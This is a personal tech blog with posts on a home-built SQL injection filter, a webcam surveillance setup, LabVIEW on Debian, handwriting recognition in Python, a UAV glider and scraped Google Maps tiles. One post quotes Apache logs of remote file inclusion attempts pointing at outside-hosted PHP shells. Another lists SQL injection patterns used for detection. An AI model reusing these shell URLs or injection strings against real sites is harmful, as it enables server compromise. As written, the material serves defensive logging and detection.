Attila Sukosd’s Blog

Wow its been a while since I’ve written something.

There has been a lot going on lately, the RoboCup 2008 robot competition is coming up soon in a month, I’ve been very busy trying to get the robot to work (pics coming soon)…

Anyway, with all this, I haven’t had a lot of time to work on my other sites, and someone just pointed out recently that there is at least on sql injection vuln in one of the sites. Since I didn’t code the site, the whole source code is a mess, 40000 lines of php code mostly showing how NOT to code. So with my time very limited atm, I decided it was time for one of my little dirty hacks. The idea was to write a wrapper function for mysql_query() that would be called instead of the real function, and it would check the query for well known and commonly used methods of SQL injection, like the ‘ OR 43=43, UNION SELECTs, CONCAT, CHAR, –, /**/, # and so on. Most of these could be easily matched with regexes, and the code was ready within half an hour, and it seemed to work very well. The only problem that remained was that it would also match them in strings as well, which resulted in some false positives, especially with characters like # and –. So I decided I’ll write a mini parser that would replace the properly escaped string values in the query with 1 and then do the matching. That got rid of the problem and now it seems to work flawlessly so far.

Right now its still in the “logging” mode, where it only logs if an attempt has been detected, but once I’ve monitored it for a few days and make sure it doesn’t interfere with any of the normal queries, I will put it in the “defend” mode that will ban the user if an attempt was detected.

P.S.: Will try to post here more often With the robot competition, I got plenty to talk about

Popularity: 2% [?]

After a recent breakin into our house (bunch of stuff stolen, including two laptops ), I decided it was time to set up some surveillance system at home. We did not want to hire any companies to set it up for us, since it would’ve been way too expensive and had bad experiences with these companies.

So I went online looking for a cheap solution, and found an excellent motion detection software called “Motion” (for linux of course). This program is very neat, it has tons of features, supporting multiple input sources including v4l, v4l2, capture cards, etc…

Then I ran into the first computer store on my way, and picked up 3 “Creative Live! Vista” cameras (the cheapest ones) which were 145DKK (27.4USD) each. Hooked it up to the old router (P2 233mhz, 256mb ram) and tested it.  However after a few minutes, it became clear this old p2 won’t be able to handle 4 cameras, so quickly routed all traffic over to the second router with the second internet connection, and replaced the router with a dual Intel P2 400mhz, 380MB RAM box hanging around my room waiting to be thrown out.

2 cameras have been on it for a few days now, and they seem to be working flawlessly. There was a little problem that one of the cameras could see a tree in the garden aswell, and it detected motion every time the wind blew, but there is a nice feature called “masking” in Motion, that allows you to load a custom black&white PGM file, where the black areas will not count as motion. This seemed to have fixed the problem, and no false positives happened ever since.

For backup, the pictures and movies of the motions are not only saved on to the local harddrive, but they are also emailed to a remote mail account, in case the router would be taken aswell.

I have also added a little alarm feature that plays a music file on the loudest volume on 2 different computers in the house, when motion is detected, which seem to work very well when your all alone in the house and want to know when someone comes in.

So far this setup has been working very nicely, the only problem is that these cameras do not work very well in dark. However recently I learnt how almost all webcams can be modified into infrared cameras. I will be posting a little howto on that later.

Popularity: 92% [?]

Today I wanted to install Laview on my laptop, but it turns out they only support RPM based distributions.

However all the packages can be simply converted into .deb with a utility called “alien”, that can be installed easily with apt-get.

# apt-get install alien

# for rpms in `ls *.rpm`; do alien -d $rpms; done

Then you should have all the debs converted.

# ls *.deb
labview82-appbuild_8.2-2_i386.deb  labview82-rte_8.2-2_i386.deb
labview82-core_8.2-2_i386.deb      labview82-vxi_8.2-2_i386.deb
labview82-desktop_8.2-2_i386.deb   labview-rte-aal_1.1-2_i386.deb
labview82-examples_8.2-2_i386.deb  niexfinder-base_1.0-8_i386.deb
labview82-help_8.2-2_i386.deb      niexfinder-labview82_1.0-8_i386.deb
labview82-pro_8.2-2_i386.deb       niwebpipeline20-dep_2.0-6_i386.deb
labview82-ref_8.2-2_i386.deb

Now they can be installed with dpkg:

# dpkg -i labview*.deb

When that’s done without an error, your almost set.

You will also need to install a package called “libosmesa6″, which can also be done from apt-get.

Then:

# cd /usr/local/natinst/LabVIEW-8.2/linux/

# mv libOSMesa.so.4.0 libOSMesa.so.4.0.backup

# ln -s /usr/lib/libOSMesa.so.6 libOSMesa.so.4.0

When thats done aswell, you should be able to start up Labview by typing

# /usr/local/natinst/LabVIEW-8.2/labview

Easy enough eh?

Popularity: 94% [?]

Today, I’ve decided I will also write an on screen keyboard in Python, that will use the handwriting recognition’s python module for X11. Pretty much like xvkbd.

A very annoying fact in xvkbd that made me do this is the fact that you have to set the focus every time you want to write something, and the flashing windows when the focus changes.

PyKBD creates a gtk window that doesn’t accept focus, so its possible to type into any windows without the annoying focus flashing

Though the I’ve only worked on it for a one or two hours, I’ve made a little debian/ubuntu .deb package that can be installed and used.

pykbd_1.0-1_i386.deb

Popularity: 95% [?]

I just bought a new tablet pc (Acer TravelMate C213). Its very nice: Intel Core Duo 2 1.66Ghz, 1GB DDR2 RAM, 120 GB IDE, NVIDIA GeForce Go 7300 256MB, and all the extras, bluetooth, wifi, fingerprint reader etc… and of course Microsoft XP tablet pc edition 2005… (no comment)

So my first action was to install the newest ubuntu on it (Ubuntu Feisty 7.04), which detected almost all hardware and works perfectly. (The fingerprint reader and the audio needed some work but it works now)

Anyway, I came to find out that there aren’t any decent handwriting recognition software for linux both opensource or commercial, which is kinda sad. So I begun to explore the possibilities in writing one. After seeing how it worked in windows, I said, how hard can it be?

In about an hour, I managed to hack together a little python application that used a drawing area in pygtk to record the mouse (pen) movements, convert it into a 16×16 matrix, flatten it to a 1D array and store it in a db. Then when the character is entered again, it tries to match the array and outputs the character where the matching percent is the highest.

I also made a little python module (_X11input) in C (swig) that gives low level access to certain X11 functions like XSendKey() and XQueryPointer() etc, which will be needed later on for sending “virtual keypresses” to the right window and dynamically setting the focus on the windows during and after the HWR (handwriting recognition).

To make it more reliable, I’m also looking into a spell checker (aspell) and a python module for it (pyaspell) to take the spelling into consideration when recognising words/letters.

To Do:

- Gnome applet for it

- gtk dockable window (preferably “Always on top”)

- multiple character entry

- character separation in words

- Aspell spell checking

- DB optimization

- X11 focus, sendkey etc (like in xvkbd)

I’ll be posting the sourcecode and screenshots later on

UPDATE: 18-Aug, Heres a new screenshot:

Popularity: 95% [?]

While I was browsing my apache web logs, I’ve noticed a few attempts for remote file inclusion:
[root@100mbitserver1 ~]# cat /var/log/httpd/access_log* |grep "p=http://"
82.103.137.106 - - [08/Jul/2007:13:54:18 +0200] "GET /index.php?p=http://kadausa.org/vietnam/cmd.do HTTP/1.0" 200 2032 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy)"
140.127.139.248 - - [01/Jul/2007:06:14:09 +0200] "GET /index.php?p=http://www.innovative-ideas.com/pr.txt? HTTP/1.1" 200 2032 "-" "libwww-perl/5.65"
140.127.139.248 - - [01/Jul/2007:06:14:19 +0200] "GET /index.php?p=http://jnbs.nl/components/com_extcalendar/pr.txt? HTTP/1.1" 200 2032 "-" "libwww-perl/5.65"
142.166.239.59 - - [04/Jul/2007:08:32:24 +0200] "GET /index.php?p=http://www.google.com HTTP/1.1" 200 2032 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
202.53.232.42 - - [06/Jul/2007:15:14:19 +0200] "GET /index.php?p=http://kadausa.org/vietnam/cmd.do? HTTP/1.1" 200 2032 "-" "Opera/9.02 (Windows NT 5.1; U; en)"
194.105.21.214 - - [24/Jun/2007:07:04:08 +0200] "GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0" 200 2032 "-" "-"
66.199.227.66 - - [24/Jun/2007:13:08:53 +0200] "GET /index.php?p=http://img376.imageshack.us/img376/7389/cmdscankz7.gif? HTTP/1.1" 200 2032 "-" "libwww-perl/5.803"
216.246.41.206 - - [24/Jun/2007:19:18:52 +0200] "GET /index.php?p=http://img376.imageshack.us/img376/7389/cmdscankz7.gif? HTTP/1.1" 200 2032 "-" "libwww-perl/5.805"
86.127.84.9 - - [26/Jun/2007:19:39:19 +0200] "GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0" 200 2032 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
81.175.110.122 - - [27/Jun/2007:02:57:36 +0200] "GET /index.php?p=http://jnbs.nl/components/com_extcalendar/pr.txt? HTTP/1.1" 200 2032 "-" "libwww-perl/5.805"
91.109.123.211 - - [22/Jun/2007:03:02:47 +0200] "GET /index.php?p=http://soundbazar.free.fr/Up/test.txt HTTP/1.1" 200 2032 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

Remote file inclusion vulnerabilities are usually exploited by passing an url with malicious code (usually php or asp) to a server to execute it, thus giving access to the server. I’ve actually seen Google being used to discover sites with vulnerabilities, for example searching for “index.php?page=*.html”.

So I started to dig around, check out those websites, most of them are either hacked or some free upload sites. Interestingly enough, I managed to get hold of (in #remote-exploit on FreeNode) one of the users/owners of no.spam.ee, tonu, who seemed to be very ignorant about it, saying that he does not care what others use his publicly put online php shells for.

<attila> where have i seen that hostname
<attila> now i remember
<attila> in my apache logs
<attila> # cat /var/log/httpd/access_log* |grep no.spam.ee
<attila> 194.105.21.214 - - [24/Jun/2007:07:04:08 +0200] “GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0″ 200 2032 “-” “-”
<attila> 86.127.84.9 - - [26/Jun/2007:19:39:19 +0200] “GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0″ 200 2032 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”
<attila> heh
<tonu> some suckers try to use this phpshell
<tonu> anyway it is not me who is hacking
<attila> take it offline then
<attila> it will always get abused
<tonu> why?
<tonu> if I put format.exe on the web and it gets abused?
<tonu> so where is my fault?
<tonu> someone formats your disk and I get sued?

Oh well, I’m not the one who will get into trouble if his server is used to hack into somewhere and cause major financial losses.

I also suggested to him to put a die() in the code, so it couldn’t be used for remote file inclusion, but it seems like he just doesn’t care.

Popularity: 100% [?]

While most of the hardware is ready for use, I’m still struggling with the walkie talkie communication. As I mentioned before, it will be used as a “sound modem” (much like the good old 56k modems) to communicate serially. I’ve been reading up on it a lot, and found a modulation technique that wouldn’t be so hard to implement but it would still perform okish. FSK (Frequency Shift Keying) works in a way that Mark (binary 1) and Space (binary 0) has different frequencies, in my case 1200Hz and 2200Hz, since its in the range of the 8kHz sampling rate. At this rate, I’m hoping to achieve around 1200bps, which would be sufficient for remote controlling and data logging.

I’ve also bought a CCD “pinhole” camera which will supply live video from the glider. The resolution is normal NTSC (648 x 486) which should be good enough for now. A 2.4ghz transmitter/receiver is still missing, since I couldn’t order it from UK.

Popularity: 96% [?]

After seeing google’s new (back then) maps.google.com, I thought how cool would it be to make a huge map of Copenhagen that could be used for a number of things, from making huge posters out of it to using it for a navigation software with GPS.

maps.google.com uses javascript to load a bunch of GIF images with the resolution of 256×256. These can be manually downloaded by looking at their urls. Sending a GET request to google with the appropriate X and Y coordinates and zoom value, it is possible to download a range of images with a simple script. After these have been downloaded, I made a php script that put all the images together into one huge gif with the resolution on 48896×60672 (15MB) http://attila.zsuatt.com/googlemaps/copenhagen.gif

After I’ve seen the success of the Copenhagen map, I have begun to make a Denmark map. Over 300000 pictures have been downloaded (with a multithreaded, load balancing script), which are over 1.4GB together, with the resolution of 155136×128768. The current problem is with putting so many pictures together. I would need to allocate over 3GB of RAM, which I don’t have at the moment So I might have to find another way to do it.

Popularity: 96% [?]

One of the cool projects (as promised) to start this blog up will be an UAV (Unmanned Areal Vehicle).

Intro:

The plan is to build an UAV Glider that would be able to autopilot itself, communicate with the ground at long (few km) distances, and send back live or snapshot pictures. The project is not only interesting from the building perspective, but also the number of possibilities it offers for further work. The uses of areal images are infinite, from traffic monitoring, search and rescue to real estate photography. I will be able to get into these fields hopefully once the glider is fully functional.

Materials:

I’ve decided not to go for a too expensive solution for now, as I haven’t really had any experience with flight control or even flying RC planes, so while I’m really hoping there won’t be any crashes, still wouldn’t want to trash thousands of dollars of equipment.

• Multiplex Easy Glider Electric (bought): A review of it can be seen on rcgroups (http://www.rcgroups.com/forums/showthread.php?t=373015), a community I’ve recently became a member of. Based on the reviews I’ve read about this plane, it is one of the most “crash resistant” and easily flyable model glider on the market, which makes it ideal for my purposes.
• Gumstix Basix 200 (bought): This will be the computer handling everything on the plane, from navigation, communication, stabilization, to power management. It has an Intel XScale 200mhz ARM cpu that can be found in PocketPCs, 64MB ram and 8MB flash. The flash contains a fully bootable linux distribution.
• GPStix (bought): It is an extension board for gumstix, that contains a gps module, audio hardware, 4 serial ports, GPIO pins, I2C bus etc. Most of these are already implemented on the Basix board, but they are not accessible easily due to the 60pin connector on it. The GPS is hardwired to one of the serial ports. I haven’t managed to test it yet as I do not currently own an active or a passive GPS antenna.
• Gyro Breakout Board - Dual Axis IDG300 (shipping from germany): A 2-axis gyro, it will be responsible for the stabilization of the plane.
• Triple Axis Accelerometer Breakout - LIS3LV02DQ (shipping from germany): 3-axis accelerometer, with this, it should be possible to figure out the wind speed and direction, as well as the plane speed.
• Motorola Walkie Talkies (bought): These walkie talkies will be used as a “sound modem” for the primary communication with the plane. They work on 446Mhz, and over a long (up to 5km) range. Their measured (by me) power consumption is 26mA when IDLE and 142mA on transmittion, which makes it suitable for a low power project like this. The expected communication rate is hopefully between 1200 and 9600bps, which is not a lot, but it should be enough for remote control and status reporting (gps, altitude, speed, computer status, temperature etc)
• Cameras (planning): Cameras are still undecided. The first idea was to have usb webcams, but since the gumstix doesn’t support USB host, that idea is out. Also the transmittion rate of the walkie talkie would not be fast enough to send pictures over it… Currently I’m thinking about using 2.4Ghz wireless cameras…

So far not much work has been done on the project, the connectors for ttyS0 and the power to the gumstix board has been soldered, and it has booted up fine. The next thing will be to hack up a little connector for one of the plane servos and test if its possible to signal them over the GPIO lines.

Popularity: 98% [?]

Hello there!

For a while now, I have been thinking about making a site to talk about my projects, however I never really had time to do anything about it. So then I decided, hey why not set up a blog for it?

And here it is…

In this blog, I’m hoping to let people enjoy the wonderful experience of exploring into different areas of computer science, which will hopefully include, but not limited to computer security, clustering, robotics, artificial intelligence, general programming and cool projects.

Popularity: 97% [?]